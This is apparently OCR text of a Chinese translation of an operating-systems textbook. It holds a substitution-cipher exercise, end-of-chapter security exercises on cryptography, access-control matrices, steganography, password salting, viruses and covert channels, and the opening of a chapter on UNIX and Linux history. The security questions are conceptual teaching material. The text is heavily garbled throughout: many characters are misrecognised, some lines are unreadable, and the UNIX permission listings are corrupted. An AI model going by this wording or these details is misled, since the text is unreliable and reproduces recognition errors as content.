ur mfudm zhx mftnm zhx mdzythc pzq ur ezsszcdm zhx gthcm 

zhx pfa kfd mdz tm sutythc fuk zhx pfdkfdi ntcm fzld pthcm 

sok pztk z stk kfd uamkdim eitdx sdruid pd fzld uoi efzk 

rui mubd ur om zid uok ur sidzkf zhx zyy ur om zid rzk 


hu foiia mztx kfd ezindhkdi kfda kfzhgdx ftb boef rui kfzk 


头 。 了 明文 每 次 用 两 个 字符 加 密 。 第 一 个 字符 是 列 ， 第 二 个 字符 是 行 。 
每 个 单元 由 包含 两 个 密 文字 和 从 的 行 和 列 交 义 组 成 。 这 样 的 矩阵 必须 有 
些 什么 限制 ? 共有 多 少 个 密 钥 ? 


3. 私 密 密 钥 机 制 比 公 钥 机 制 更 有 效 ， 但 需要 发 送 者 和 接收 者 事先 
共用 一 个 密 铀 。 假 设 发 送 痢 和 接收 者 从 未 碰 到 过 ， 但 有 可 信 的 第 三 


与 发 送 方 共享 密 钥 与 接收 方 也 共享 密 钥 〈 另 一 个 ) 。 那 么 发 送 方 和 接 
收 方 如 何在 这 种 环境 下 建立 一 个 新 的 共 至 密码 体制 ? 


4. 举 一 个 位 单 例子 说 明 一 个 数学 函数 ， 对 一 级 近似 来 说 这 一 函数 
re A JH] ERB ° 
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道 的 。 在 这 种 情况 下 两 个 卫生 人 如 何 建立 一 个 新 的 对 称 密 钥 ? 


6. 假 设 一 个 系统 在 某 时 有 1000 个 对 象 和 100 个 域 。 在 所 有 域 中 1% 
的 对 象 是 可 访问 的 (r、w 和 x 的 某 种 组 合 ， 两 个 域 中 有 10% 的 对 象 是 
可 访问 的 ， 剩 下 89% 的 对 象 只 在 惟一 一 个 域 中 才 可 访问 。 假 设 需要 一 
个 单位 的 空间 存储 访问 权 (rr、w 和 x 的 某 种 组 合 ) 、 对 象 ID 或 一 个 域 
ID。 分 别 需 要 多 少 空间 存储 全 部 的 保护 矩阵 、 作 为 访问 控制 表 的 保护 
和 窃 阵 和 作为 能 力 表 的 保护 矩阵 ? 


7. 我 们 讨论 过 的 两 种 保护 机 制 有 能 力 表 和 访问 控制 表 。 对 于 下 面 
每 个 保护 问题 ， 请 问 应 该 使 用 哪个 机 制 。 


a)Ken 希 望 除了 他 的 某 位 办 公 室 的 同事 之 外 ， 其 他 所 有 人 都 可 以 读 
到 他 的 文件 。 


b)Mitch 和 Steve 想 要 共享 一 些 秘密 文件 。 


OLinda 想 要 她 一 部 分 的 文件 是 公开 的 。 


8. 说 出 在 这 个 UNIX 目 录 里 所 列 保护 矩阵 的 所 有 者 和 操作 权限 。 请 
注意 ，asw 属 于 两 个 组 : users 和 devel; gmw 仅 仅 是 users 组 的 成 员 。 把 
两 个 成 员 和 两 个 组 当 作 域 ， 和 矩阵 就 有 四 行 (每 个 域 一 行 ) 和 四 列 (每 
eoa 


-w-f--r-- 2 gmw users 908 May2616:45 PPP-Notes 
-WXI-Xr-x 1 asw devel 432 May1312:35 progi 
-w-w---- 1 asw users 50094 May3017:51 prolectt 
-w-f----- 1 asw devel 13124 May3114:30 — splash.gif 


9. 把 前 一 个 问题 中 的 内 容 作 为 访问 列表 ， 说 出 每 个 所 列 目录 的 操 
作 权 限 。 


10. 在 保护 权限 的 Amoeba 架 构 里 ， 用 户 可 要 求 服务 器 产生 一 个 至 
有 部 分 权限 的 新 权限 ， 并 可 转移 给 用 户 的 朋友 。 如 果 该 朋友 要 求 服 务 
右 移 去 更 多 的 权限 以 便 转移 给 其 他 人 的 话 ， 会 发 生 什么 情况 呢 ? 


11. 在 图 9-13 里 ， 从 进程 B 到 对 象 1 没有 箭头 。 可 以 允许 存在 这 类 科 
SKIS? 如 有 果 存 在， 它 破坏 了 什么 原则 ? 


12. 如 采 在 图 9-13 里 允许 消 轧 从 进程 传递 到 进程 ， 这 样 符合 的 是 什 
么 原则 ? 特别 对 进程 B 来 说 ， 它 可 以 对 哪些 进程 发 送 消 思 ， 哪 些 不 可 
以 ? 


13. 请 看 图 9-16 所 示 的 隐 写 术 。 每 个 像素 由 色彩 空间 的 点 表示 ， 该 
扩 处 在 其 轴 为 R、G、 和 B 值 的 三 维系 统 中 。 在 使 用 这 个 空间 时 ， 请 解 
释 在 图 片 中 如 有 果 使 用 了 隐 写 术 ， 对 分 辨 紊 有 何 影 响 ? 


14. 采 用 各 种 压缩 算法 ASCII 文 件 里 的 自然 语言 可 被 压缩 至 少 
50%。 如 果 采 用 在 1600x1200 图 片 中 每 个 像素 低位 插入 ASCII 文 本 的 方 
法 ， 隐 写 术 可 写 入 的 容量 大 小 为 多 少 个 字 节 ? 图片 尺 寸 将 增加 到 多 少 

〈 假 设 没 有 加 密 数 据 也 没有 由 加 密 带 来 的 扩展 ) ? 这 种 方法 的 效率 即 
负载 / 《所 传送 的 字 节 ) BRK? 


15. 假 设 一 组 紧密 联系 的 持 不 同 政见 着 在 被 压制 的 国家 使 用 隐 写 术 
发 送 有 关 该 国 的 状况 消息 到 国外 ， 政 府 意 识 到 这 一 点 并 发 送 含有 虚假 
言 轧 的 伪造 图 片 。 这 些 持 不 同 政见 着 如 何 告诉 人 们 来 区 分 真实 的 消 恩 
ASTRA TE I? 


16. 去 www.cs.vu.nl/ast 网 站 点 击 covered writing 链接 。 按 照 指 令 抽取 
剧本 。 回 答 下 面 的 问题 : 


(a) 原 始 的 斑马 纹 和 斑马 约 文 件 的 大 小 是 多 少 ? 
人 b) 斑 马 纹 文件 中 秘密 地 存储 了 什么 剧本 ? 
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17. 让 计算 机 不 回 显 密码 比 回 显 星 号 安全 些 。 因 为 回 显 出 星 号 会 让 
屏幕 周围 的 人 知道 密码 的 长 度 。 假 设 密码 仅 包 括 大 小 写字 母 和 数字 ， 
密码 长 度 必 须 大 于 5 个 字符 小 于 8 个 字符 ， 那 么 在 不 出 现 回 显 时 有 多 安 


全 ? 


18. 在 得 到 学 位 证 书后 ， 你 申请 作为 一 个 大 学 计算 中 心 的 管理 者 。 
这 个 计算 中 心 正好 淘汰 了 旧 的 主机 ， 转 用 大 型 的 LAN 服 务 亏 并 运行 
UNIX 系 统 。 你 得 到 了 这 个 工作 。 工 作 开始 15 分 钟 后 ， 你 的 助理 冲 进来 
叫 道 ,，“ 有 的 学 生发 现 了 我 们 用 来 加 密 密 码 的 算法 并 贴 在 Internet。” 那 
么 你 该 怎么 办 ? 


19.Morris-Thompson 采 用 nm 位 随机 码 (th) 的 保护 模式 使 得 入 侵 者 
很 难 发 现 大 量 事先 用 普通 字符 串 加 密 的 密码 。 当 一 个 学 生 试 图 从 目 己 
的 计算 机 上 猜 出 超级 用 户 密 码 时 ， 这 一 结构 能 提供 安全 保护 吗 ? 假设 
密码 文件 是 可 读 的 。 


20. 请 解释 UNIX 口 令 机 制 与 加 密 原 理 的 不 同 。 


21. 假 设 一 个 黑客 可 以 得 到 一 个 系统 的 密码 文件 。 系 统 使 用 有 n 位 
salt 的 Morris-Thompson 保 护 机 制 的 情况 相对 于 没有 使 用 这 种 机 制 的 情 
况 下 ， 黑 客 需 要 多 少 额 外 的 时 间 破 解 所 有 密码 。 


22. 请 说 出 3 个 有 效 地 采用 生物 识别 技术 作为 登录 认证 的 特征 。 


23. 某 个 计算 机 科学 系 有 大 量 的 在 本 地 网 络 上 的 UNIX 机 絮 。 任 何 
机 器 上 的 用 户 都 可 以 以 


rexec machine4 who 


的 格式 发 出 命令 并 在 machine4 上 执行 ， 而 不 用 远程 登录 。 这 一 结 
果 是 通过 用 户 的 核心 程序 把 命令 和 UID 发 送 到 远程 计算 机 所 完成 的 。 
在 这 一 系统 中 ， 核 心 程序 是 可 信任 的 吗 ? 如 果 有 些 计 算 机 是 学 生 的 无 
保护 措施 的 个 人 计算 机 呢 ? 


24. 在 UNIX 系 统 里 使 用 密码 与 Lamport 登 未 到 非 安全 网 络 的 架构 有 
何 相同 点 ? 


25.Lamport 的 一 次 性 密码 技术 采用 的 逆序 密码 。 这 种 方法 比 第 一 
次 用 f(s)， 第 二 次 用 f(f(s)) 并 依次 类 推 的 方法 更 简单 吗 ? 


26. 使 用 MMU 硬 件 来 阻止 如 图 9-24 的 溢出 攻击 可 行 吗 ? 解释 为 什 
LP 
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种 特性 没有 被 广泛 使 用 ? 


28. 特 洛 伊 木 马 可 以 在 由 权限 保护 的 系统 中 工作 吗 ? 


29. 在 删除 文件 时 ， 文 件 块 被 放 回 空闲 块 列 表 ， 但 并 没有 被 请 除 。 
你 认为 让 操作 系统 在 释放 之 前 首先 清除 每 个 文件 块 十 个 好 办 法 吗 ? 请 
从 这 两 种 做 法 的 安全 性 和 性 能 分 别 考虑 ? 并 解释 每 种 操作 的 效果 ? 


30. 寄 生病 毒 如 何 保证 a) 在 主 程序 运行 前 目 己 先 运行 ? b) 完 成 目 己 
的 操作 后 把 控制 权 交 还 给 主 程序 ? 


31. 有 些 操作 系统 需要 在 磁道 的 开始 处 设置 砚 副 分 区 。 这 对 引导 区 
病毒 来 说 有 什么 便利 ? 


32. 改 变 图 9-27 所 示 的 程序 ， 让 它 找 到 所 有 的 C 语 言 程序 而 不 是 可 
执行 程序 。 


33. 图 9-32d 所 示 的 病毒 被 加 密 过 。 反 病毒 实验 室 的 科学 家 如 何 判 
断 哪 部 分 文件 是 加 密 密 钥 以 便 能 够 解密 病毒 代码 并 反 同 恢复 ?” Virgil 如 
何 才能 让 这 些 科学 家 的 工作 更 困难 ? 


34. 图 9-32c 的 病毒 同时 有 压缩 程序 和 解压 缩 程 序 。 解 压缩 程序 用 来 
展开 并 运行 被 压缩 的 可 运行 程序 ， 那 么 压缩 程序 用 来 做 什么 呢 ? 


35. 从 病毒 制作 者 的 观点 出 发 ， 说 出 多 形态 加 和 冤 病 毒 的 一 个 缺点 。 
36. 通 常人 们 把 下 列 操作 看 作 是 受到 病毒 攻击 后 的 恢复 措施 : 


a) 局 动 被 感染 的 系统 。 


b) 把 所 有 文件 备份 到 外 部 存储 介质 。 
cj 运行 fdisk 格 式 化 磁盘 。 

d) 从 原版 的 CD-ROM 重 新 安装 操作 系统 。 
e) 从 外 部 存储 介质 重新 装 入 文件 。 


请 说 明 上 述 操作 中 的 两 个 错误 。 


37. 在 UNIX 里 可 能 存在 共事 者 病毒 吗 〈 不 改动 已 有 文件 的 病 
? 如 果 可 能 ， 为 什么 ? 如 果 不 可 能 ， 为 什么 ? 


pi 


38. Jie AR R AKA ETA? EM lor alle E? 


39. 目 解压 缩 文件 ， 把 一 个 或 多 个 文件 以 及 一 个 提取 程序 压缩 在 一 
起 ， 通 常用 作 发 布 程序 或 升级 程序 。 请 讨论 这 种 文件 的 安全 特性 。 


40. 讨 论 用 某 个 程序 做 输入 ， 写 一 个 判断 此 输入 程序 是 否 含有 病毒 
程序 的 可 能 性 。 


41.9.8.1 节 描述 了 通过 一 系列 防火 载 规则 将 外 界 访问 限制 在 仅 有 的 
三 个 服务 上 。 请 描述 另 一 个 能 添加 到 此 防火 场 上 的 规则 集 ， 使 得 对 这 
些 服 务 的 访问 受到 进一步 严格 的 限制 。 


42. 在 某 些 计 算 机 上 ， 图 9-37b 使 用 的 SHR 指 令 用 “0” 来 填充 未 被 使 
用 的 位 ;而 其 他 位 向 右 移 。 对 图 9-37b 来 说 ， 使 用 不 同 的 移 位 指令 对 正 
确 性 是 否 存在 影响 ? 如 果 有 影响 ， 哪 种 移 位 方法 更 好 一 些 ? 


43. 要 校 验 Applet 是 否 由 可 信 的 供应 丙 标 记 ，Applet 供 应 两 可 以 提 
供 由 可 信 第 三 方 等 署 的 证 书 ， 其 中 包括 其 公 钥 。 但 是 读 取证 书 用 户 需 
要 可 信 第 三方 的 公 钥 。 这 可 由 第 四 方 提供 ， 但 是 用 户 又 需要 第 四 方 的 
公 钥 。 这 看 上 去 没有 办 法 解决 验证 系统 ， 然 而 实际 上 浏览 器 却 可 以 做 
le 


44. 描 述 使 得 Java 成 为 比 C 能 写 出 更 安全 的 程序 的 编程 语言 的 三 个 
特征 。 


45. 假 设 你 的 系统 使 用 JDK 1.2。 给 出 允许 一 个 来 自 
www.appletsRus.com 的 小 应 用 程序 在 你 的 机 器 上 运行 时 你 使 用 的 规则 
(类 似 图 9-39 中 的 那些 规则 ) 。 这 个 小 应 用 程序 可 能 从 
www.appletsRus.com 中 下 载 额 外 的 文件 ， 在 /asrtmp/ 中 读 写 文件 ， 也 
从 /usrme/appletdir 中 读 文 件 。 


46. 用 C 语 言 或 shell 脚 本 写 一 对 程序 ， 通 过 UNIX 系 统 里 的 隐蔽 信道 
来 发 送 和 接收 消息 。 提 示 : 即使 当 文件 不 可 访问 时 也 可 以 看 到 许可 
位 ， 通 过 设置 其 参数 的 方法 ， 确 保 sleep 命 令 或 系统 调用 被 延迟 一 段 固 


定 的 时 间 。 请 度量 在 一 个 空 采 系统 上 的 数据 率 ， 然 后 通过 局 动 大 量 的 
各 种 后 台 进 程 来 人 为 创建 较 大 的 负载 ， 再 次 计算 数据 率 。 


47. 一 些 UNIX 系 统 使 用 DES 算 法 加 密 密 码 。 这 些 系 统 通 常 连 续 25 
次 应 用 DES 算 法 获得 加 密 密 码 。 从 网 上 下 载 一 个 DES 的 实现 ， 写 一 个 
程序 加 密 一 个 密码 ， 检 查 一 个 密码 对 这 个 系统 是 否 有 效 。 使 用 Morris- 


Thompson 保 护 机 制 产 生 一 个 有 10 个 加 密 密 码 的 列表 。 使 用 16 位 盐 。 


48. 假 设 一 个 系统 使 用 访问 控制 表 维护 它 的 保护 和 矩阵。 根据 如 下 和 情 
况 写 一 组 管理 画 数 管理 访问 控制 表 ，(1) 创 建 一 个 新 的 项 目 ，(2) 删 除 一 
个 对 象 ，(3) 创 建 一 个 新 域 ，(4) 删 除 一 个 域 ，(5) 新 的 访问 权限 (r、w 
和 x 的 某 种 组 合 ) 被 授予 一 个 域 来 访问 一 个 对 象 ，(6) 撤 销 已 存在 的 对 
一 个 域 的 对 象 的 访问 权限 ;，(7) 授 予 某 个 对 象 对 所 有 域 的 访问 权限 ，(8) 
撤销 某 个 对 象 对 所 有 域 的 访问 权限 。 


第 10 章 ”实例 研究 1: Linux 


在 前 面 的 章节 中 ， 我 们 大 体 上 学 习 了 很 多 关于 操作 系统 的 原理 、 
抽象 、 算 法 和 技术 。 现 在 分 析 一 些 具体 的 操作 系统 ， 看 一 看 这 些 原理 
在 现实 世界 中 是 怎样 应 用 的 。 我 们 将 从 Linux 开 始 ， 它 是 UNIX 的 一 个 
很 流行 的 衍生 版 本 ， 可 以 运行 在 各 类 计算 机 上 “。 它 不 仅 是 高 端 工作 站 
和 服务 器 上 的 主流 操作 系统 之 一 ， 还 在 移动 电话 到 超级 计算 机 的 一 系 
列 系 统 中 得 到 应 用 。Linux 系 统 也 体现 了 很 多 重要 的 操作 系统 设计 原 
理 。 


我 们 将 从 Linux 的 历史 以 及 UNIX 与 Linux 的 演化 开始 讨论 ， 然 后 给 
出 Linux 的 概述 ， 从 而 使 读者 对 它 的 使 用 有 一 些 概念 。 这 个 概述 对 那些 
只 熟悉 Windows 系 统 的 读者 尤为 有 用 ， 因 为 Windows 系 统 实际 上 对 使 
用 者 隐藏 了 几乎 所 有 的 系统 细节 。 虽 然 图 形 界面 可 以 使 初学 着 很 容易 
EF, 但 它 提 供 了 很 少 的 灵活 性 而 且 不 能 使 用 户 洞 察 到 系统 是 如 何 工 
作 的 。 


接 下 来 是 本 章 的 核心 内 容 ， 我 们 将 分 析 Linux 的 进程 与 内 存 管理 、 
VO > 文件 系 统 以 及 安全 机 制 。 对 于 每 个 主题 ， 我 们 将 移 讨 论 基本 概 
念 ， 然 后 是 系统 调用 ， 最 后 讨论 实现 机 制 。 


我 们 首先 应 该 解决 的 问题 是 : 为 什么 要 用 Linux 作 为 例子 ?的 确 ， 
Linux 是 UNIX 的 一 个 衍生 版 本 ， 但 UNIX 自 身 有 很 多 版 本 ， 还 有 很 多 其 
他 的 衍生 版 本 ， 包 括 AIX、FreeBSD、HP-UX、SCO UNIX ` System 
VSolaris 等 。 和 幸运 的 是 ， 所 有 这 些 系统 的 基本 原理 与 系统 调用 大 体 上 是 
相同 的 〈 在 设计 上 ) 。 此 外 ， 它 们 的 总 体 实现 策略 、 算 法 与 数据 结构 
也 很 相似 ， 不 过 也 有 一 些 不 同 之 人 处。 为 了 使 我 们 的 例子 更 具体 ， 最 好 
选 定 一 个 系统 然后 从 始 至 终 地 对 它 进行 讨论 。 因 为 大 多 数 读 者 相对 于 
其 他 系统 而 言 更 容易 接触 到 Linux， 故 我 们 选中 Linux 作 为 例子 。 况 且 
除了 实现 相关 的 内 容 ， 本 章 的 大 部 分 内 容 对 所 有 UNIX 系 统 都 是 适用 
的 。 有 很 多 书籍 介绍 怎样 使 用 UNIX， 但 也 有 一 些 介绍 其 高 级 特性 以 及 


系统 内 核 (Bovet 和 Cesati ，2005; Maxwell, 2001; McKusick 和 


Neville-Neil, 2004; Pate, 2003; Stevens 和 Rago，2008; Vahalia, 
2007) 


10.1 UNIX 与 Linux 的 历史 


UNIX 与 Linux 有 一 段 漫 长 而 又 有 趣 的 历史 ， 因 此 我 们 将 从 这 里 开 
始 我 们 的 学 习 。UNIX 开 始 只 是 一 个 年 轻 的 研究 人 员 (Ken 
Thompson) 的 业余 项 目 ， 后 来 发 展 成 价值 数 十 亿美 元 的 产业 ， 涉 及 大 
学 、 跨 国 公司 、 政 府 与 国际 标准 化 组 织 。 在 接 下 来 的 内 容 里 我 们 将 展 
开 这 段 历史 。 


10.1.1 UNICS 


回 到 20 世 纪 40~50 年 代 ， 当 时 使 用 计算 机 的 标准 方式 是 签约 租用 
一 个 小 时 的 机 时 ， 然 后 在 这 个 小 时 内 独占 整 台 机 器 。 至 少 从 这 个 角 
度 ， 所 有 的 计算 机 都 是 个 人 计算 机 。 当 然 ， 这 些 机 器 体积 庞大 ， 在 任 
何 时 候 只 有 一 个 人 (程序 员 ) 能 使 用 它们 。 当 批 处 理 系统 在 20 世 纪 60 
年 代 兴 起 时 ， 程 序 员 把 任务 记录 在 打 孔 卡片 上 并 提交 到 机 房 。 当 机 拟 
积累 了 足够 的 任务 后 ， 将 由 操作 员 在 一 次 批 处 理 中 处 理 。 这 样 ， 往 往 
在 提交 任务 一 个 甚至 几 个 小 时 后 才能 得 到 结果 。 在 这 种 情况 下 ， 调 斌 
成 为 一 个 费时 的 过 程 ， 因 为 一 个 错位 的 去 号 都 会 导致 程序 员 浪 费 数 小 
时 。 


为 了 摆脱 这 种 公认 的 令 人 失望 且 没 有 效率 的 设计 安排 ，Dartmouth 
学 院 与 M.ILT 发 明了 分 时 系统 。Dartmouth 系 统 只 能 运行 BASIC， 并 且 
经 历 了 短暂 的 商业 成 功 后 就 消失 了 。M.LT 的 系统 CTSS 用 途 广泛 ， 在 
科学 界 取 得 了 巨大 的 成 功 。 不 久之 后 ， 来 自 Bell 实 验 室 与 通用 电器 
(随后 成 为 计算 机 的 销售 者 ) 的 研究 者 与 M.LI 合 作 开始 设计 第 二 代 系 
统 MULTICS (MULTiplexed Information and Computing Service， 多 路 
复 用 信息 与 计算 服务 ) ， 我 们 在 第 一 章 讨论 过 它 。 


虽然 Ball 实验 室 是 MULTICS 项 目的 创始 方 之 一 ， 但 是 它 后 来 撤 出 


了 这 个 项 目 ， 仪 留 下 一 位 研究 人 员 Ken Thompson 寻 找 一 些 有 意思 的 


N 


西 继续 研究 。 他 最 终 决 定 在 一 台 废 弃 的 PDP-7 小 型 机 上 自己 写 一 个 精 
简 版 的 MULTICS (当时 使 用 汇编 语言 ) 。 尽 管 PDP-7 体 积 很 小 ， 但 是 
Thompson 的 系统 实际 上 可 以 工作 并 且 能 够 支持 他 的 开发 成 果 。 随 后 ， 
Bell 实 验 室 的 另 一 位 研究 者 Brian Kernighan 有 点 开玩笑 地 把 它 叫做 
UNICS (UNiplexed Information and Computing Service， 单 路 信息 与 计 
TRE) 。 尽 管 和 EUNUCHS” 的 双关 语 是 对 MULTICS 的 删 减 ， 但 是 这 
个 名 字 保 留 了 下 来 ， 虽 然 其 拼写 后 来 变 成 了 UNIX ° 


10.1.2 PDP-11 UNIX 


Thompson 的 工作 给 很 多 他 在 Bell 实 验 室 的 同事 留 下 了 深刻 的 印 
象 ， 很 快 Dennis Ritchie 加 入 进来 ， 搂 着 是 他 所 在 的 整个 部 门 。 在 这 段 
时 间 ，UNIX 系 统 有 两 个 重大 的 发 展 。 第 一 ，UNIX 从 过 时 的 PDP-7 计 
算 机 移植 到 更 现代 化 的 PDP-11/20， 然 后 是 PDP-11/45 和 PDP-11/70。 后 
两 种 机 器 在 20 世 纪 70 年 代 占 据 了 小 型 计算 机 的 主要 市 场 。PDP-11/45 和 
PDP-11/70 的 功能 更 为 强大 ， 有 着 在 当时 较 大 的 物理 内 存 (分 别 为 
256KB 与 2MB) 。 同 时 ， 它 们 有 内 存 保护 人 硬件， 从 而 可 以 同时 支持 多 
个 用 户 。 然 而 ， 它 们 都 是 16 位 机 器 ， 从 而 限制 了 单个 进程 只 能 拥有 
64KB 的 指令 空间 和 64KB 的 数据 空间 ， 即 使 机 器 能 够 提供 远大 于 此 的 
物理 内 存 。 


第 二 个 发 展 则 与 编写 UNIX 的 编程 语言 上 有关。 直到 现在 ， 为 每 台新 
机 右 重 写 整个 系统 显然 是 一 件 很 无 趣 的 事情 ， 因 此 Thompson 决 定 用 自 
己 设计 的 一 种 高 级 语言 B 重 写 UNIX。B 是 BCPL 的 简化 版 (BCPL H E 
是 CPL 的 简化 版 ， 而 CPL 就 像 PL/I 一 样 从 来 没有 好 用 过 ) 。 由 于 B 的 种 
种 缺陷， 尤其 是 缺乏 数据 结构 ， 这 次 演 试 并 不 成 功 。 接 着 Ritchie 设 计 
了 B 语 言 的 后 继 者 ， 很 自然 地 命名 为 C。Ritchie 同 时 为 C 编 写 了 一 个 出 
色 的 编译 器 。Thompson 和 Ritchie 一 起 工作 ， 用 C 重 写 了 UNIX。C 是 恰 
当 的 时 间 出 现 的 一 种 恰当 的 语言 ， 从 此 统治 了 操作 系统 编程 。 


1974 年 ，Ritchie 和 Thompson 发 表 了 一 篇 关于 UNIX 的 里 程 碑 式 的 
论文 (Ritchie 和 Thompson，1974) 。 由 于 他 们 在 论文 中 介绍 的 工作 ， 
他 们 随后 获得 了 享有 盛誉 的 图 灵 奖 (Ritchie, 1984; Thompson, 
1984) 。 这 篇 论文 的 发 表 使 许多 大 学 向 Bell 实 验 室 索要 UNIX 的 复制 。 
由 于 Bell 实 验 室 的 母 公司 AT&T 在 当时 作为 垄断 企业 受到 监管 ， 不 允许 
经 营 计 算 机 业务 ， 它 很 愿意 能 够 通过 向 大 学 出 售 UNIX 获 取 适 度 的 费 
用 o 


一 个 偶然 事件 往往 能 够 决定 历史 。PDP-11 正 好 是 几乎 所 有 大 学 的 
计算 机 系 选 择 的 计算 机 ， 而 PDP-11 预 装 的 操作 系统 使 大 量 的 教授 与 学 
生 望 而 生 有 旦 。UNIX 很 快 地 填补 了 这 个 空白 。 这 在 很 大 程度 上 是 因为 
UNIX 提 供 了 全 部 的 源 代 码 ， 人 们 可 以 《实际 上 也 这 么 做 了 ) 不 断 地 进 
行 修补 。 大 量 科学 会 议 围绕 UNIX 举 行 ， 在 会 上 杰出 的 演讲 者 们 站 在 台 
上 介绍 他 们 在 系统 核心 中 找到 并 改正 的 隐蔽 错误 。 一 位 澳大利亚 教授 
John Lions 用 通常 是 为 乔 抽 (Chaucer) 或 莎士比亚 (Shakespeare) 作 
品 保留 的 格式 为 UNIX 的 源 代码 编写 了 注释 (1996 年 以 Lions 的 名 义 重 
新 印刷 ) 。 这 本 书 介绍 了 版 本 6， 之 所 以 这 么 命名 是 因为 它 出 现在 
UNIX 程 序 员 手 册 的 第 6 版 中 。 源 代码 包含 8200 行 C 代 码 以 及 900 行 汇编 
代码 。 由 于 以 上 所 有 这 些 活动 ， 关 于 UNIX 系 统 的 新 想法 和 改进 迅速 传 
播 开 来 。 


在 几 年 内 ， 版 本 6 被 版 本 7 代替 ， 后 者 是 UNIX 的 第 一 个 可 移植 版 本 
(运行 在 PDP-11 以 及 Interdata 8/32 上 ) ， 已 经 有 18 800 行 C 代 码 以 及 
2100 行 汇编 代码 。 在 版 本 7 上 培养 了 整整 一 代 的 学 生 ， 这 些 学 生 毕 业 去 

业界 工作 后 促进 了 它 的 传播 。 到 了 20 世 纪 80 年 代 中 期 ， 各 个 版 本 的 
UNIX 在 小 型 机 与 工程 工作 站 上 已 广 为 使 用 。 很 多 公司 甚至 买 下 源 代 码 
版 权 开 发 自己 的 UNIX 版 本 ， 其 中 有 一 家 年 轻 小 公司 叫做 Microsoft (fr 
软 ) ， 它 以 XENIX 的 名 义 出 售 版 本 7 好 几 年 了 ， 直 到 它 的 兴趣 转移 到 
了 其 他 方向 上 。 


10.1.3 ”可 移植 的 UNIX 


既然 UNIX 是 用 C 编 写 的 ， 将 它 移动 或 者 移植 (正式 说 法 ) 到 一 台 
新 机 髓 上 比 早先 的 时 候 要 容易 多 了 。 移 植 肯 先 需 要 为 狐 机 器 写 一 个 C 
编译 堪 ， 人 然后 需要 为 新 机 如 的 IO 设备 ， 如 显示 右 、 打 印 机 、 磁 一 等 编 
写 设备 驱动 。 虽 然 驱 动 的 代码 是 用 C 写 的 ， 但 由 于 没有 两 个 磁盘 按照 
同样 的 方式 工作 ， 它 不 能 被 移植 到 男 一 台 机 器 ， 并 在 那 台 机 器 上 编译 
运行 。 最 终 ， 一 小 部 分 依赖 于 机 器 的 代码 ， 如 中 断 处 理 或 内 存 管 理 程 
序 ， 必 须 重 写 ， 通 第 使 用 汇编 语言 。 


从 PDP-11 向 外 的 第 一 次 移植 是 到 Interdata 8/32 小 型 机 上 。 这 次 实 
践 显示 出 UNIX 在 设计 时 暗 售 了 一 大 批 关 于 系统 运行 机 器 的 假定 ， 例 如 
假定 整 型 的 大 小 为 16 位 ， 指 针 的 大 小 也 是 16 位 (暗示 程序 最 大 容量 为 
64KB) ， 还 有 机 器 刚好 有 三 个 寄存 器 存放 重要 的 变量 。 这 些 假定 没有 
一 个 与 Interdata 机 器 的 情况 相符 ， 因 此 整理 修改 UNIX 需 要 大 量 的 工 
作 。 


男 一 个 问题 来 自 Ritchie 的 编译 器 。 尽 管 它 速度 快 ， 能 够 产生 高 质 
量 的 目标 代码 ， 这 些 代码 只 是 基于 PDP-11 机 器 。 有 别 于 针对 Interdata 
机 器 写 一 个 新 编译 器 的 通常 做 法 ，Bell 实 验 室 的 Steve Johnson 设 计 并 实 
现 了 可 移植 的 C 编 译 器 ， 只 需要 适量 的 修改 工作 就 能 够 为 任何 设计 合 


理 的 机 器 生成 日 标 代码 。 多 年 以 来 ， 除了 PDP-11 以 外 几乎 所 有 机 器 的 
C 编 译 需 都 是 基于 Johnson 的 编译 右 ， 因 此 Johnson 的 工作 极 大 地 促进 了 
UNIX 在 新 计算 机 上 的 普及 。 


由 于 所 有 的 开发 工作 都 必须 在 惟一 可 用 的 UNIX 机 人 釉 PDP-11 上 进 
行 ， 这 人 台 机 器 正 好 在 Bell 实 验 室 的 第 五 层 ， 而 Interdata 在 第 一 层 ， 因 此 
最 初 问 Interdata 机 器 的 移植 进度 缓慢 。 生 成 一 个 新 版 本 意味 着 在 五 楼 
编译 ， 人 然后 把 一 个 磁带 搬 到 一 楼 去 检查 这 个 版 本 是 否 能 用 。 在 搬 了 几 
个 月 的 磁带 后 ， 有 人 提出 : “要 知道 我 们 是 一 家 电话 公司 ， 为 什么 我 们 
不 把 两 台 机 器 用 电线 连接 起 来 ? ”这 样 UNIX 网 络 诞生 了 。 在 移植 到 
Interdata 之 后 ，UNIX 叉 移植 到 VAX 和 其 他 计算 机 上 。 


在 AT&T 于 1984 年 被 美国 政府 拆 分 后 ， 它 获得 了 设立 计算 机 子 公 
司 的 法 律 许 可 ， 并 很 快 就 这 样 做 了 。 不 入 ，ATS&T 发 布 了 第 一 个 商业 
化 的 UNIX 产 品 一 一 System II。 它 并 没有 被 很 好 地 接受 ， 因 此 在 一 年 
之 后 就 被 一 个 改进 的 版 本 System V 取 代 。 关 于 System IV 发 生 了 什么 是 
计算 机 科学 史上 最 大 的 未 解 之 迹 之 一 。 最 初 的 System V 很 快 就 被 
System V 的 第 2 版 ， 第 3 版 ， 接 着 是 第 4 版 取代 ， 每 一 个 新 版 本 都 更 加 庞 
大 和 复杂 。 在 这 个 过 程 中 ，UNIX 系 统 背 后 的 初始 思想 ， 即 一 个 简单 、 
精致 的 系统 ， 逐 渐 地 消失 了 。 虽 然 Ritchie 与 Thompson 的 小 组 之 后 开发 
了 UNIX 的 第 8、 第 9 与 第 10 版 ， 由 于 AT&T 把 所 有 的 商业 力量 都 投入 到 
推广 System V 中 ， 它 们 并 没有 得 到 广泛 的 传播 。 然 而 ，UNIX 的 第 8、 


第 9 与 第 10 版 的 部 分 思想 被 最 终 包含 在 System V 中 。ATST 最 后 决定 ， 
它 毕 竟 是 一 家 电话 公司 而 不 是 一 家 计算 机 公司 ， 因 此 把 UNIX 的 生意 在 
19934F 3224 T Novell ° Novelh Ja 7£ 19954478 E X$ T Santa Cruz 
Operation。 那 时 候 谁 拥 有 UNIX 的 生意 已 经 无 关 紧 要 了 ， 因 为 所 有 主要 


的 计算 机 公司 都 已 经 拥有 了 其 许可 证 。 


10.1.4 Berkeley UNIX 


加 州 大 学 伯克利 分 校 (University of California at Berkeley) 是 早期 
获得 UNIX 第 6 版 的 众多 大 学 之 一 。 由 于 获得 了 整个 源 代码 ，Berkeley 
可 以 对 系统 进行 充分 的 修改 。 在 ARPA (Advanced Research Project 
Agency, (美国 国防 部 ) 高 级 研究 计划 署 ， 的 赞助 下 ，Berkeley 开 发 
并 发 布 了 针对 PDP-11 的 UNIX 改 进 版 本 ， 称 为 1BSD (First Berkeley 
